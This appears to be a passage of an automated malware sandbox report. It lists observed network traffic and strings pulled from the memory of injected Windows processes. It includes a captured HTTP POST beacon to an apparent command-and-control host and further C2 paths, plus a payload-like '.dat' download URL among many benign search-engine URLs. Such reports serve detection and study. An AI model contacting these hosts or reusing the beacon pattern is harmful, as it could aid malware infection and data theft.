    POST /api1/UIQiXLAMLg4t/Rxi8q7e6zSs/ppLkAThUDmfSS4/yOwm_2Fga2xC15DtBLwwh/NmjWIzvmns9CddET/_2BZ8hEeadvYwxh/uFd3lt60_2FyFVn_2B/iXlprICf_/2B45OhMJZjYIDjqw_2Fm/eJGvB3vDUzSSCsuPGEa/M5YE6Mv5RHrzGnZcbFsa5w/jziyOzx_2FuIu/uDOGy6Dr/GOjy4MP82vBaLdGCF5ixS2x/rbQcfTwYvE/gJjw4kL5BH7Kw6DJX/9XhSSfgVL_2B/BdxG6AZO_0A/_0Dtw28OxMea_2/Ff8pUZzLyl3SHdNWDlXEm/PFk1VIj4/S9_2B75z5/EF HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Content-Length: 2
    Host: api3.lepini.at
  Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 13 Sep 2020 23:23:07 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
  Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
  Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
  Source: {81817910-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr, ~DFF147473DA56FBCCD.TMP.13.dr | String found in binary or memory: http://api10.laptok.at/api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/bjG0FzF8tkMfsf
  Source: {81817912-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr | String found in binary or memory: http://api10.laptok.at/api1/ZrPM67eDMe0PJ3bd_2/FxYQ81wrj/FZQ351HtZv0VYLflOyX0/44ew0J0pAyJ2Zdt06J1/ej
  Source: explorer.exe, 0000001D.00000000.558338655.0000000007E1D000.00000004.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3
  Source: explorer.exe, 0000001D.00000000.544734516.0000000000E60000.00000002.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/x
  Source: {81817914-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr, ~DF637F64B7AC0A53C0.TMP.13.dr | String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/xXyOPB
  Source: explorer.exe, 0000001D.00000003.591331392.000000000F2D0000.00000004.00000040.sdmp | String found in binary or memory: http://api10.laptok.at/favicon.icoyu1SPS
  Source: explorer.exe, 0000001D.00000002.639553770.00000000063BB000.00000004.00000001.sdmp | String found in binary or memory: http://api3.lepini.at/gs-
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639553770.00000000063BB000.00000004.00000001.sdmpString found in binary or memory: http://chat.allager.at/jvassets/xI/t64.dat
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.560164145.000000000E1DB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001D.00000000.544775772.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.13.dr | String found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001D.00000000.557748192.0000000007CC8000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
